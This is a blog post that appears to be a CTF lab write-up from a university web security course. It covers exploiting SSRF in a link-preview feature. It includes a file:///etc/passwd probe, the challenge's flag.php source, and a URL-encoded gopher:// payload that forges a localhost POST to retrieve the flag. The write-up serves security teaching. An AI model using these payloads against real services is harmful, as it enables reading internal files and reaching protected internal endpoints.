Simple Web 0x12(Lab - Web Preview Card)

Posted on 2024-01-01 | Post modified | In Security Course｜NTUST WS｜SSRF |

Simple Web 0x12(Lab - Web Preview Card)

tags: `NTUSTWS` `CTF` `Web`

Challenge: http://h4ck3r.quest:8500/

Background

Exploit - SSRF

When you see a preview function, then it may have SSRF problem.

Test it file:///etc/passwd or http://127.0.0.1

Analyze flag.php

 <?php
 if ($_SERVER['REMOTE_ADDR'] !== '127.0.0.1') die("Only for localhost user.");
 ?>
 <form action="/flag.php" method="post">
     Do you want the FLAG? <input type="text" name="givemeflag" value="no">
     <input type="submit">
 </form>
 <?php
 if (isset($_POST['givemeflag']) && $_POST['givemeflag'] === 'yes')
     echo "FLAG:", getenv('FLAG');

If you want flag, you need visit /flag.php as localhost and send a form data with parameter givemeflag.

Construct package - **gopher**
1
2
3
4
5
6
POST /flag.php HTTP/1.1 Host: 127.0.0.1 Content-Length: 14 Content-Type: application/x-www-form-urlencoded givemeflag=yes
Transferred by urlencode with CRLF type.

Payload: gopher://127.0.0.1:80/_POST%20%2Fflag.php%20HTTP%2F1.1%0d%0aHost%3A%20127.0.0.1%0d%0aContent-Length%3A%2014%0d%0aContent-Type%3A%20application%2Fx-www-form-urlencoded%0d%0a%0d%0agivemeflag%3Dyes%0d%0a
Then we got flag…

Flag: FLAG{gopher://http_post}

Post author: SBK6401
Post link: https://bernie6401.github.io/Simple-Web-0x12(Lab-Web-Preview-Card)/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.